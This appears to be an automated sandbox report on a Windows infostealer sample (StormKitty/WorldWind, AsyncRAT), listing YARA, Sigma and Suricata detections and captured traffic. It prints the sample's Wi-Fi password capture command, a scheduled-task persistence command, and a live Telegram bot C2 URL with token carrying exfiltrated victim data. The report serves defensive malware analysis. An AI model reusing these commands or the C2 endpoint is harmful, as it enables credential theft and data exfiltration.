0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x4b0e9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x4b00e:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x4aff2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x4b0b0:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x4b090:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x49b51:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x54e98:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x4ee8b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x54d72:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x54c70:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x54d02:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x51283:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x5335f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x53345:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN 0x53327:$s3: \VPN\ProtonVPN
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x51abb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x51b2d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x51bb7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x51c49:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x51cb3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x51d25:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x51dbb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x51e4b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x3dbac:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x472ea:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x471ea:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x5276b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.?)" 0x5299d:$s6: "encrypted_key":"(.?)"
Click to see the 53 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\FUEvp5c8lO.exe, ProcessId: 8116, TargetFilename: C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FUEvp5c8lO.exe", ParentImage: C:\Users\user\Desktop\FUEvp5c8lO.exe, ParentProcessId: 8116, ParentProcessName: FUEvp5c8lO.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7696, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE StormKitty Data Exfil via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:15:48.254740+0100	2031009	1	Malware Command and Control Activity Detected	192.168.2.9	49847	149.154.167.220	443	TCP

ET MALWARE WorldWind Stealer Checkin via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:15:48.254740+0100	2044766	1	A Network Trojan was detected	192.168.2.9	49847	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:15:49.447538+0100	2803305	3	Unknown Traffic	192.168.2.9	49854	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:15:48.254740+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49847	149.154.167.220	443	TCP
2025-01-10T21:15:49.447538+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49854	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FUEvp5c8lO.exe

Avira: detected

Found malware configuration

Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
Source: FUEvp5c8lO.exe.8116.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}

Multi AV Scanner detection for submitted file

Source: FUEvp5c8lO.exe	Virustotal: Detection: 74%			Perma Link
Source: FUEvp5c8lO.exe	ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: FUEvp5c8lO.exe

Joe Sandbox ML: detected

Source: FUEvp5c8lO.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.9:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49847 version: TLS 1.2

Source: FUEvp5c8lO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 4x nop then jmp 07376901h	0_2_07375F79
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 4x nop then jmp 07376901h	0_2_07376210
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 4x nop then jmp 07376901h	0_2_0737602F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49854 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49847 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.9:49847 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.9:49847 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%203:15:35%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20536720%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20N2MY7%0ARAM:%204095MB%0AHWID:%2040A9177C21%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.44.66 104.21.44.66
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49854 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%203:15:35%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20536720%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20N2MY7%0ARAM:%204095MB%0AHWID:%2040A9177C21%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 144.48.8.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Fri, 10 Jan 2025 20:15:49 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.orgd
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/t
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.comd
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000328C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000329F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000328C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKittyTC
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: History.txt.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: FUEvp5c8lO.exe, 00000003.00000002.2629288674.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, places.raw.3.dr, tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: FUEvp5c8lO.exe, 00000003.00000002.2629288674.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, places.raw.3.dr, tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: FUEvp5c8lO.exe, 00000003.00000002.2629288674.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, places.raw.3.dr, tmp385A.tmp.dat.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.9:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49847 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
